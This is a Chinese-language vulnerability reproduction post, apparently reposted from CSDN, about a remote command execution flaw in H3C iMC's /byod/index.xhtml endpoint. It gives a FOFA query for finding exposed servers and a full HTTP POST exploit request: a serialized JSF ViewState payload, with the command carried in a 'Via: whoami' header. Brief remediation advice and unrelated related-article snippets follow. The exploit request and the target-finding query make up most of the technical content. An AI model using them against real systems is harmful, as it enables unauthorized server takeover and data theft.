首页 > 其他分享 >【漏洞复现】华三 H3C IMC 智能管理中心 /byod/index.xhtml RCE

【漏洞复现】华三 H3C IMC 智能管理中心 /byod/index.xhtml RCE

时间:2024-09-10 13:52:45浏览次数:12  
标签:H3C IMC index .... 漏洞 byod xhtml ...

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。如有侵权,请联系删除。

产品简介

H3C iMC 智能管理中心是一款基于B/S架构推出的综合网络管理产品。IMC以网络管理为核心,特别强调网络中的各种资源、用户和网络服务。其目标是为网络管理员提供一种集成资源、用户和网络服务的网络管理解决方案,实现对网络的端到端管理。它融合了当前多个产品,以统一风格提供与网络相关的各类管理、控制、监控等功能;同时以开放的组件化的架构原型,向平台及其承载业务提供分布式、分级式交互管理特性;并未业务软件的下一代产品提供最可靠的、可扩展、高性能的业务平台。

漏洞描述

华三 H3C IMC 智能管理中心 /byod/index.xhtml 存在命令执行漏洞,攻击者可以通过这个漏洞在服务器上执行任意命令,完全控制权,进行非法操作、窃取和篡改敏感数据,甚至完全接管服务器,给系统的安全性带来严重威胁。

网络空间测绘

Fofa

(title="用户自助服务" && body="/selfservice/javax.faces.resource/") || body="/selfservice/index.xhtml"

image.png

漏洞复现

POST /byod/index.xhtml HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 2186
Content-Type: application/x-www-form-urlencoded
Via: whoami
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

javax.faces.ViewState=8SzWaaoxnkq9php028NtXbT98DEcA...Uh57HB/L8xz6eq%2b4sy0rUOuOdM5ccd2J6LPx8c6%2b53QkrX...jpFKgVnp07bad4n6CCBW8l98QIKwByAhLYdU2VpB/voaa....2oU%2burahQDFE8mIaFvmwyKOHiwyovIHCVymqKwNdWXm3iHLhYEQXL4....k3z7MWm%2bwbV2Dc9TXV4rs8E6M7ZvVM3B0pORK8vAhd2iLBkgFhGHw9ZgOwifGnyMzfxlU....gG4chEOg57teuLurMPrulbEVBAEl7rRwobqvxb91sG%2bGMrGWFL5%2bwFvE56x7UEzHtE/o0IRtzTKi/EFnamrPT1046e7L8jABKDB/LjCX2qAOmqQkIz4gXrEFnHHYZ9LZc7t9ZZPNT...JZjummuZuror/zwPbnsApwXlYsn2hDAZ7QlOBunA3t7omeOTI5keWXvmOH8eoEEN//SlmQblwhBZ7kSHPvStq0ZciiPptEzVjQ/k/gU2QbCSc7yG0MFbhcJEDQj4yKyJ/yTnOOma....KuNzZl%2bPpEua%2b28h2YCKipVb5S/wOCrg%2bKD3DUFCbdWHQRqDaZyvYsc8C0X7fzutiVUlSB7OdGoCjub9WuW0d2eeDWZmOt3Wunms3SwAbE7R%2bonCRVS8tiYWF8qiQS%2bl0k8Gw/Hz6Njpfe0upLIAtPFNDuSf69qGg4isEmY2FtoSQTdD8vU0BdJatHrBArPgo9Qsp0jSJBlUz2OqteQg05PYO6gEBXVj/RiTBHI1/pOzlcE0wVZcLUHnxGNvckSCTiT....nWbkWGJ8AYCvrM0PHZ/BYcKKRf3rMHoIqcAN%2bORMhXcmAXRcvq29c5xqoOuvrMSJPDZmbZhcm/99crGJSO5HxXQder9WKm2tVBaDLEC9ulpWyICJYgfxayoWkt6vwPcq2Tn20vn5RDpfqJKLNLbrV8g7JDRUUyW%2b....R6PRNunKhfJHvHcXAZ73mkCUf7cMUbNhqCbLSGP/D%2bqpqWXk5ZWjsT4tQ9tFH9uvPIaNB7FlcFXI2I2A9oPoY0ltif%2bb8BdPXVfpuZq8boHE4hY%2b33BIl%2bIa%2bov6nyMmGIzCKYeRbfDJtk/45EXvink6BIgA/205la6vvqKTGQ32o1AtepBgKei....604cVvbEP7UKor09Gz61mryE4D%2biXG1prZGCT3LEtdASuCkmf4RTEc5wks2In3ElZSZl8zf3RsHA0dgbvrpnXe2wLPI%2bUCAGO%2biOG9/%2bbCQJQNFmykkyRbmslfcilUxZ%2bIg%2bQuOs9FlMod2ICrkktOFFeZWNeznx737S8H4Nf2%2bp2QNHY2I6GFGtWpqjeZ%2bGmb1euM5Tzi06eJ.......koPrjkDT9VPoxCgpRMQl06x7NShkos7BCI9fV1%2b17t5gWZvqAYzeQUsZLaiBXaZfuUtPuBmbq1re/dB/VgSOn4QX%2b8AwwDjtfazsHw4aIdh4e2a1y/Ou2ZiI//EzkwIBksY6CluuPgocdvtOfNiWcXsfYs3UKLmL/48A4Ls0OF1TrQK4UnfCYt.....1DGrwzfXnM9vLHznFaJenqvLY3yTiKN5SSVxvGwvhmp6PFW4Jj7G8NXdr/zN7HyC9Eg1Y1jKP7uiO%2bGM2U/etvMOCKwnfP2MnbznP378fZHf1H9yiVVrn%2bm%2b0u8PV.....2MsOTgS6B7C8ItflgSfJz5dkJ8IssRAcY%2bu/2QjrW95BBMSRPu2EaCUm1IpuszXEwHYgDizWPzDB0hSRgCEjncpGhPX3i10bK4/snBaBcAxAa1e2er2LDe/4WgaIwc9w2wKn3wXY5B87BKF5/Xq30....NNf6EMRrQ9154rEkCJb4IU4sFsTuyYlfZatlV%2bC2HM7u7FEbdVvr6yYK4oQqvfPmF5yRplwAYUQAvr1jwLbGYxhGaTy14UUrtvoyph5Sqebk2YTKjKX4U7xX5ha4YbyoVIMSRzdvB6YXDY3BId%2bgmMWZtTf2UE%2b9UAx/7g30pQNXA....FP1adq6ySd4x3dGVCe4YJcYe2gKWYVcWj5XPwUSt2fxdshzgFnjjqmRgxowH2u2nZU0xG539lnxIOlB

image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。
2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。
3、及时升级产品到最新版本。

标签:H3C,IMC,index,....,漏洞,byod,xhtml,...
From: https://blog.csdn.net/weixin_41924764/article/details/141828583

相关文章

  • [H3C] 什么是H3C Anchor-AC?
    H3CAnchor-AC是新华三集团(H3C)推出的一款无线控制器产品。无线控制器在无线网络中扮演着重要的角色,它负责管理和控制多个无线接入点(AP),以确保整个无线网络的高效运行和安全性。主要功能和特点集中管理:Anchor-AC可以集中管理大量的无线接入点,简化了网络配置和维护工作。无缝漫游:通......
  • H3C-IMC智能管理中心RCE漏洞复现
    0x01漏洞描述:autoDeploy接口中存在远程代码执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。该漏洞利用难度较低,建议受影响的用户尽快修复。0x02搜索语句:Fofa:(title="用户自助服务"&&body="/selfservice/java......
  • neovim 安装插件,并配置vimconig
    neovim安装插件,并配置vimconig1.neovim安装参考这里2.插件包管理器安装Vundle是vim的一个插件管理器,同时它本身也是vim的一个插件。插件管理器用于方便、快速的安装、删除、Vim更新插件。vimVundle插件官方地址:https://github.com/VundleVim/Vundle.vim下载Vundle插件......
  • PPPOE拨号实验(H3C)
    一、实验拓扑二、实验要求要求R1通过PPPoe拨号的方式获取公网地址内网部分通过ospf打通,内网访问公网通过easyip方式实现(仅允许1.0和2.0)三、实验步骤local-user19912341234classnetwork#创建用于chap验证的用户passwordsimpleadministrator111service-typep......
  • H3C EVPN 网关配置
    一、H3C集中式EVPN网关配置1、需求:使用RouterA、RouterB为与服务器连接的VTEP设备;RouterC为与广域网连接的集中式EVPN网关设备;RouterD为RR,负责在路由器之间反射BGP路由。虚拟机VM1和VM3属于VXLAN10;VM2和VM4属于VXLAN20。相同VXLAN之间可以二层互通,不同VXLAN之......
  • Centos7 安装 Imc
    centos7安装imc注意:安装的时候必须选择图形化安装。即安装系统的时候,“软件选择”那块选择“带GUI的服务器”。关闭selinux和防火墙systemctlstopfirewalldsystemctldisablefirewalldsetenforce0sed-i"s/^SELINUX=enforcing/SELINUX=disabled/g"/etc/sysco......
  • H3C SecPath 防火墙产品 典型配置案例集(V7)(RXX60 EXX60 E1185)-6W600
    H3CSecPathF1000系列防火墙https://www.h3c.com/cn/Service/Document_Software/Document_Center/IP_Security/FW_VPN/F10X0/?CHID=188680&v=612H3CSecPath防火墙产品典型配置案例集(V7)(RXX60EXX60E1185)-6W600https://www.h3c.com/cn/pub/Document_Center/2023/08/Web......
  • 华为、华三H3C、锐捷、迈普交换机配置SSH
    华为交换机配置ssh登录   注意,当你是telnet登录后,在新增sshuser这个的时后不可以telnet是的用户,要使用rsalocal-key-paircreat后的新增用户sshuser****才可以成功   配置完成后记得保存,使用ssh登录测试,不要着急删除当前telnet用户,确保成功后在删除   理解下SS......
  • H3CNE(IP地址与子网划分)
    目录4.1进制转化4.1.1IP地址表示 4.1.2十进制转二进制​编辑4.2IP地址构成4.2.1IP与子网掩码网络部分:用来标识一个网络4.2.2IP寻址与网关概念4.3IP地址分类 4.3.1IP地址类型与其取值范围 4.3.2私网IP地址 4.3.3特殊IP地址4.4子网划分示例1:示例2:......
  • H3CNE(vlan与子接口技术)
    目录10.1vlan间通信技术示例一(多臂路由):10.2子接口技术 示例二(子接口技术):10.3vlannif接口技术10.3.1三层交换机与VLANNIF技术 示例三VLANNIF配置(将交换机当成路由器使用):10.1vlan间通信技术  实现不同vlan间的通讯:示例一(多臂路由):先配置SW1:[SW1]vlan......